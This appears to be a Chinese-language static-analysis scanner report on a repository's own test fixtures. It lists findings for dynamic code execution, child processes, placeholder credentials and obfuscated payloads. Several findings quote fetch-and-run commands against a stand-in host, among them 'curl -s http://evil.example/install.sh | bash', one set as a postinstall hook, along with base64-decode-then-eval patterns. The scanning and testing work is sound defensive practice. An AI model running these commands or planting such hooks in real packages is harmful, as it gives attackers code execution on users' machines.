严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
docs/example-report.json:93GitHub 93curl -s http://evil.example/install.sh | bash
规则备注 · 更像是展示给用户的安装提示字符串,而非程序自行执行;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
docs/example-report.json:205GitHub 205curl -s http://evil.example/x.sh | bash
规则备注 · 命中位置附近存在子进程调用;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
66eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式
模型研判占位/示例
report.js:66 是代码注释中的举例文字“例:eval(atob(...))”,用于说明重叠抑制逻辑,并非真实存在的 eval 调用。
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
高HT-OBFUSCATION-001源码呈现混淆或载荷隐藏特征
置信度 低L2 · 静态分析
66atob(...)) 同时命中 SEN-EXEC-004(解码执行,具体)与 SEN-EXEC-003(裸 eval
规则备注 · 解码后直接进入执行
模型研判占位/示例
同一行 66 属于注释说明文本,仅作为规则示例出现,不会被解释器执行。
修复建议以可读源码分发;若必须打包,请提供可复现构建与 source map。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
376curl/wget/网络地址/base64/chmod 等,典型形状是 curl … | bash
规则备注 · 更像是展示给用户的安装提示字符串,而非程序自行执行
修复建议先下载并校验固定哈希,再由用户显式执行。
高HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
142new Function(
规则备注 · 出现在字符串或注释中
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
高HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
142new Function(
规则备注 · 出现在字符串或注释中
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
中HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/cross-file-taint.test.js:17GitHub 17node:child_process
规则备注 · 命令由运行时变量拼接,需确认输入来源是否可信;位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-assignment.jsGitHub 1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
高HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-db-exec.js:6GitHub 6eval(
规则备注 · 位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
高HT-OBFUSCATION-001源码呈现混淆或载荷隐藏特征
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-db-exec.js:5GitHub 5Buffer.from(args.data, 'base64').toString() eval
规则备注 · 解码后直接进入执行;位于测试、示例或文档目录
修复建议以可读源码分发;若必须打包,请提供可复现构建与 source map。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-destructure.jsGitHub 1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-object-property.jsGitHub 1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-spawn-safe-argv.jsGitHub 1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-spawn-shell.jsGitHub 1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-trusted-comment-bypass.jsGitHub 1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/edge/edge-ts-tool.tsGitHub 1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/evasions/ev1-alias.jsGitHub 1child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/evasions/ev2-computed-prop.jsGitHub 1child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/evasions/ev3-optional-chain.jsGitHub 1child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/malicious/pos1-tool-shell.jsGitHub 1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/fixtures/bench/malicious/pos2-eval-atob.js:2GitHub 2eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
高HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/fixtures/bench/malicious/pos6-decode-exec.js:2GitHub 2eval(
规则备注 · 位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
高HT-OBFUSCATION-001源码呈现混淆或载荷隐藏特征
置信度 低L2 · 静态分析
test/fixtures/bench/malicious/pos6-decode-exec.jsGitHub 1Buffer.from(payload, 'base64').toString() eval
规则备注 · 解码后直接进入执行;位于测试、示例或文档目录
修复建议以可读源码分发;若必须打包,请提供可复现构建与 source map。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/bench/malicious/pos7-cross-function.jsGitHub 1node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
高HT-INSTALL-001安装阶段执行高风险生命周期脚本
置信度 低L1 · 供应链
test/fixtures/evil-plugin/package.json:12GitHub 12"postinstall": "curl -s http://evil.example/install.sh | bash"
规则备注 · 位于测试、示例或文档目录
修复建议移除安装期执行,或提供可复现构建产物并将脚本改为显式命令。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
test/fixtures/evil-plugin/package.json:12GitHub 12curl -s http://evil.example/install.sh | bash
规则备注 · 命令位于字符串字面量中,执行路径需人工确认;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/evil-plugin/plugin/index.js:7GitHub 7node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/fixtures/evil-plugin/plugin/index.js:27GitHub 27execSync
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
test/fixtures/evil-plugin/plugin/index.js:24GitHub 24curl -s http://evil.example/x.sh | bash
规则备注 · 命中位置附近存在子进程调用;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
高HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/fixtures/evil-plugin/plugin/index.js:18GitHub 18eval(
规则备注 · 出现在字符串或注释中;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/fixtures/evil-plugin/plugin/index.js:20GitHub 20eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/hardening.test.js:9GitHub 9execFileSync
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/hardening.test.js:9GitHub 9node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
高HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/hardening.test.js:591GitHub 591eval(
规则备注 · 位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
高HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/hardening.test.js:827GitHub 827eval(
规则备注 · 出现在字符串或注释中;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/plugin-load.test.js:83GitHub 83eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/professional.test.js:194GitHub 194node:child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
test/professional.test.js:226GitHub 226child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
test/professional.test.js:516GitHub 516curl evil | sh
规则备注 · 命令位于字符串字面量中,执行路径需人工确认;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
test/professional.test.js:672GitHub 672curl http://evil.example/x | bash
规则备注 · 命中位置附近存在子进程调用;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/professional.test.js:84GitHub 84eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
高HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
test/professional.test.js:309GitHub 309eval(
规则备注 · 位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
严重HT-SECRET-001疑似硬编码凭据
置信度 低L2 · 静态分析
test/professional.test.js:167GitHub 167sk-proj-ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
规则备注 · 包含占位/示例词汇;位于测试、示例或文档目录
修复建议立即吊销凭据,并改用 DSH 凭据服务或环境引用。
严重HT-SECRET-001疑似硬编码凭据
置信度 低L2 · 静态分析
test/professional.test.js:183GitHub 183ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij
规则备注 · 包含占位/示例词汇;位于测试、示例或文档目录
修复建议立即吊销凭据,并改用 DSH 凭据服务或环境引用。
高HT-OBFUSCATION-001源码呈现混淆或载荷隐藏特征
置信度 低L2 · 静态分析
test/professional.test.js:308GitHub 308Buffer.from(payload, 'base64').toString() eval
规则备注 · 解码后直接进入执行;位于测试、示例或文档目录
修复建议以可读源码分发;若必须打包,请提供可复现构建与 source map。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
229execSync
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
266child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
57curl | bash
规则备注 · 命令位于字符串字面量中,执行路径需人工确认;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-EXEC-002远程脚本直连 Shell 执行
置信度 低L2 · 静态分析
66curl|bash
规则备注 · 命令位于字符串字面量中,执行路径需人工确认;位于测试、示例或文档目录
修复建议先下载并校验固定哈希,再由用户显式执行。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
59eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
高HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
375new Function(
规则备注 · 出现在字符串或注释中;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
355child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
低HT-EXEC-001直接创建宿主子进程
置信度 低L2 · 静态分析
400child_process
规则备注 · 位于测试、示例或文档目录
修复建议通过 DSH 受控执行边界运行命令,并公开参数与审批策略。
严重HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
85eval(
规则备注 · 动态执行与编码解码出现在同一语句,是典型的载荷隐藏模式;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
高HT-RUNTIME-001动态代码执行
置信度 低L2 · 静态分析
102eval(
规则备注 · 出现在字符串或注释中;位于测试、示例或文档目录
修复建议使用静态模块和受约束的配置解析器,避免执行动态字符串。
高HT-OBFUSCATION-001源码呈现混淆或载荷隐藏特征
置信度 低L2 · 静态分析
386Buffer.from(payload, 'base64').toString() eval
规则备注 · 解码后直接进入执行;位于测试、示例或文档目录
修复建议以可读源码分发;若必须打包,请提供可复现构建与 source map。